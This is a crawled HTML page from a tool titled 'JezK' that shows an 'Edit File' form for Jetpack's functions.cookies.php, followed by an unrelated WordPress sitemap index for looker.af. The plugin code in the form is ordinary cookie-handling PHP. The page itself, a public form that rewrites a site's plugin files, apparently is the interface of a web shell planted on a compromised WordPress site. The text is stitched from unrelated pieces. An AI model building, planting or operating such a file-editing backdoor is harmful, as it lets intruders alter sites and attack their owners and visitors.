
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: functions.cookies.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php // phpcs:ignore WordPress.Files.FileName.NotHyphenatedLowercase
/**
 * This file is meant to be the home for any function handling cookies that can
 * be accessed anywhere within Jetpack.
 *
 * This file is loaded whether or not Jetpack is connected to WP.com.
 *
 * @package automattic/jetpack
 */

/**
 * A PHP 7.0 compatible version of the array argument version of PHP 7.3&#039;s setcookie().
 *
 * Useful for setting SameSite cookies in PHP 7.2 or earlier.
 *
 * @param string $name    Name of the cookie.
 * @param string $value   Value of the cookie.
 * @param array  $options Options to include with the cookie.
 * @return bool False when error happens, other wise true.
 */
function jetpack_shim_setcookie( $name, $value, $options ) {
	$not_allowed_chars = &quot;,; \t\r\n\013\014&quot;;

	if ( false !== strpbrk( $name, $not_allowed_chars ) ) {
		return false;
	}

	if ( headers_sent() ) {
		return false;
	}

	$cookie = &#039;Set-Cookie: &#039; . $name . &#039;=&#039; . rawurlencode( $value ) . &#039;; &#039;;

	if ( ! empty( $options[&#039;expires&#039;] ) ) {
		$cookie_date = gmdate( &#039;D, d M Y H:i:s \G\M\T&#039;, $options[&#039;expires&#039;] );
		$cookie     .= sprintf( &#039;expires=%s&#039;, $cookie_date ) . &#039;;&#039;;
	}

	if ( ! empty( $options[&#039;secure&#039;] ) &amp;&amp; true === $options[&#039;secure&#039;] ) {
		$cookie .= &#039;secure; &#039;;
	}

	if ( ! empty( $options[&#039;httponly&#039;] ) &amp;&amp; true === $options[&#039;httponly&#039;] ) {
		$cookie .= &#039;HttpOnly; &#039;;
	}

	if ( ! empty( $options[&#039;domain&#039;] ) &amp;&amp; is_string( $options[&#039;domain&#039;] ) ) {
		if ( false !== strpbrk( $options[&#039;domain&#039;], $not_allowed_chars ) ) {
			return false;
		}
		$cookie .= sprintf( &#039;domain=%s&#039;, $options[&#039;domain&#039;] . &#039;; &#039; );
	}

	if ( ! empty( $options[&#039;path&#039;] ) &amp;&amp; is_string( $options[&#039;path&#039;] ) ) {
		if ( false !== strpbrk( $options[&#039;path&#039;], $not_allowed_chars ) ) {
			return false;
		}
		$cookie .= sprintf( &#039;path=%s&#039;, $options[&#039;path&#039;] . &#039;; &#039; );
	}

	if ( ! empty( $options[&#039;samesite&#039;] ) &amp;&amp; is_string( $options[&#039;samesite&#039;] ) ) {
		$cookie .= sprintf( &#039;SameSite=%s&#039;, $options[&#039;samesite&#039;] . &#039;; &#039; );
	}

	$cookie = trim( $cookie );
	$cookie = trim( $cookie, &#039;;&#039; );
	header( $cookie, false );

	return true;
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
